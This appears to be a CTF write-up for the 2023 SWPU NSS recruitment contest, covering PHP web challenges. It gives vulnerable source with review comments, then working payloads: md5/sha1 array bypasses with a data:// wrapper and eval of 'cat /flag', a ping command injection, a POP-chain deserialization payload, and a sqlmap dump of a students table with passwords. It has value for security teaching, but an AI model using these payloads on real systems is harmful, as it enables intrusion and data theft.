2023年SWPU NSS 秋季招新赛 (校外赛道)

一键连接!

<?php
// Challenge source: three nested checks on GET parameters guard an eval() of a POST field.
// Prints this script's own source into the response.
highlight_file(__FILE__);
// Turns error reporting off, so warnings raised by the calls below are not displayed.
error_reporting(0);
// All five values are read straight from the query string; nothing below checks
// that they are strings.
$md5_1 = $_GET['md5_1'];
$md5_2 = $_GET['md5_2'];
$sha1_1 = $_GET['sha1_1'];
$sha1_2 = $_GET['sha1_2'];
$new_player =$_GET['new_player'];
// Check 1: the two inputs must differ under strict comparison while their md5() results are identical.
// NOTE(review): the input types are never validated, and the request shown on this page sends
// array parameters (md5_1[]=...). On PHP 7, md5() given an array returns null, so both sides are
// null and compare equal; PHP 8 raises a TypeError instead. An is_string() check before hashing
// closes this.
if ($md5_1 !== $md5_2 && md5($md5_1) === md5($md5_2)) {
// Check 2: same shape for sha1(), except the inputs are compared loosely (!=) rather than strictly.
// The same missing type check applies here.
if ($sha1_1 != $sha1_2 && sha1($sha1_1) === sha1($sha1_2)) {
// Check 3: a request-supplied name is handed to file_get_contents(), which accepts stream
// wrappers as well as file paths; the failure message below hints at the data: wrapper.
// NOTE(review): resolve names against a fixed allow-list instead of reading whatever the client names.
if (file_get_contents($new_player) === "Welcome to NSSCTF!!!") {
echo "Congratulations~~~~~~~~~";
echo "试试need Antsword<br/>";
// Executes the POST field 'Nss' as PHP source; '@' suppresses any error it raises.
// NOTE(review): eval() on request data is arbitrary code execution and cannot be made safe
// by filtering the input; the only fix is to remove it.
@eval($_POST['Nss']);
}else{
echo "可曾听过data协议?";
}
} else {
echo "sha1又如何相等呢";
}
} else {
echo "如何让md5值相等呢¿";
}

?md5_1[]=QNKCDZO&md5_2[]=s155964671a&sha1_1[]=aaroZmOk&sha1_2[]=aaK1STfY&new_player=data://text/plain,Welcome to NSSCTF!!!

Nss=system(“cat /flag”);

NSS_HTTP_CHEKER

POST /?this_is_get=get_%1t HTTP/1.1
Host: node6.anna.nssctf.cn:28397
User-Agent: NSSCTF
X-Forwarded-For:127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 17
Origin: http://node6.anna.nssctf.cn:28397
Connection: close
Referer: http://node6.anna.nssctf.cn:28397/
Cookie: PHPSESSID=1b41efa492475836bbc4873098999ab3;this_is_cookie=cookie_suki_desu~
Upgrade-Insecure-Requests: 1

this_is_post=p03t

Pingpingping

<?php
// Challenge source: runs ping against a request-supplied value, or shows an image when none is given.
// Prints this script's own source into the response.
highlight_file(__FILE__);
// Turns error reporting off.
error_reporting(0);
// NOTE(review): PHP rewrites certain characters in incoming parameter names, so the name a
// client sends can differ from the key read here; the URL on this page sends `Ping[ip.exe`.
$_ping = $_GET['Ping_ip.exe'];
if(isset($_ping)){
// The value is concatenated into the shell command line unescaped, so any shell metacharacters
// in it are interpreted by the shell (command injection).
// NOTE(review): validate the value as an IP address (filter_var() with FILTER_VALIDATE_IP) and
// pass it through escapeshellarg() before it reaches system().
system("ping -c 3 ".$_ping);
}else{
// No parameter supplied: read error.png and embed it in the page as a base64 data URI.
$data = base64_encode(file_get_contents("error.png"));
echo "<img src='data:image/png;base64,$data'/>";
}

http://node6.anna.nssctf.cn:28422/?Ping[ip.exe=127.0.0.1;cat /flag

UnS3rialize

<?php
/**
 * Holds a shell command and runs it when an instance is called like a function.
 *
 * NOTE(review): system() executes whatever string $cmd holds; $cmd is a public
 * property, so any code that can set it controls the command that runs.
 */
class NSS
{
    /** Command line passed to system() by __invoke(). */
    public $cmd = "cat /f*";

    /**
     * Runs on unserialize(): prints a marker and overwrites $cmd with a fixed
     * echo command.
     */
    public function __wakeup()
    {
        print "W4keup!!!<br/>";
        $this->cmd = "echo Welcome to NSSCTF";
    }

    /**
     * Runs when the object is called as a function: prints a banner, then
     * hands $cmd to system().
     */
    public function __invoke()
    {
        print "Congratulations!!!You have learned to construct a POP chain<br/>";
        system($this->cmd);
    }
}
/**
 * Calls whatever is stored in $whoami whenever an undefined or inaccessible
 * property is read on the instance.
 */
class C
{
    /** Value that __get() invokes as a callable. */
    public $whoami;

    /**
     * Runs on a read of a property that is not accessible: prints a prompt,
     * then calls $whoami with no arguments and returns its result.
     *
     * NOTE(review): nothing checks what $whoami is before it is called, so an
     * object with __invoke() stored there is executed as-is.
     */
    public function __get($argv)
    {
        print "what do you want?";
        $callable = $this->whoami;
        $result = $callable();
        return $result;
    }
}
/**
 * Converts to a string by reading the `var` property of the object held in $sth.
 */
class T
{
    /** Object whose `var` property supplies the string value. */
    public $sth;

    /**
     * Runs when the instance is used as a string: prints a message, then
     * returns $sth->var. If `var` is not accessible on $sth, that read
     * triggers $sth's own __get().
     */
    public function __toString()
    {
        print "Now you know how to use __toString<br/>There is more than one way to trigger";
        $inner = $this->sth;
        return $inner->var;
    }
}
/**
 * Prints $notes from its destructor when $user and $passwd hold the expected values.
 *
 * NOTE(review): a destructor runs for every instance, including one rebuilt by
 * unserialize(); presumably the target deserialises client data, which is how
 * this method becomes reachable. Prefer json_decode(), or unserialize() with
 * ['allowed_classes' => false], for untrusted input.
 */
class F
{
    public $user = "SWPU";
    public $passwd = "NSS";
    /** Concatenated into the output by __destruct(). */
    public $notes;

    // A two-argument constructor is commented out in this listing, so new F()
    // takes no arguments and keeps the default $user and $passwd above.

    /**
     * Runs when the object is destroyed: stops the script with "N0!" unless
     * both credentials match, otherwise prints a banner followed by $notes.
     * Concatenating $notes converts it to a string, which calls __toString()
     * when $notes is an object.
     */
    public function __destruct()
    {
        $credentialsMatch = $this->user === "SWPU" && $this->passwd === "NSS";
        if (!$credentialsMatch) {
            die("N0!");
        }

        print "Now you know how to use __construct<br/>";
        print "your notes" . $this->notes;
    }
}

// Build the nested object graph F -> T -> C -> NSS through the public
// properties, then print its serialized form.
// NOTE(review): each link relies on a magic method of the class above it
// (__destruct, __toString, __get, __invoke). On the defending side the fix is
// not to deserialise client-supplied data into these classes at all.
$command = new NSS();

$caller = new C();
$caller->whoami = $command;

$stringer = new T();
$stringer->sth = $caller;

$root = new F();
$root->notes = $stringer;

$serialized = serialize($root);
print $serialized;

O:1:”F”:3:{s:4:”user”;s:4:”SWPU”;s:6:”passwd”;s:3:”NSS”;s:5:”notes”;O:1:”T”:1:{s:3:”sth”;O:1:”C”:1:{s:6:”whoami”;O:3:”NSS”:1:{s:3:”cmd”;s:7:”cat /f*”;}}}}

base64编码传上去即可

python sqlmap.py -r 1.txt -D school -T students -C name,student_id,grade,password -dump -batch

在表格里可以看到flag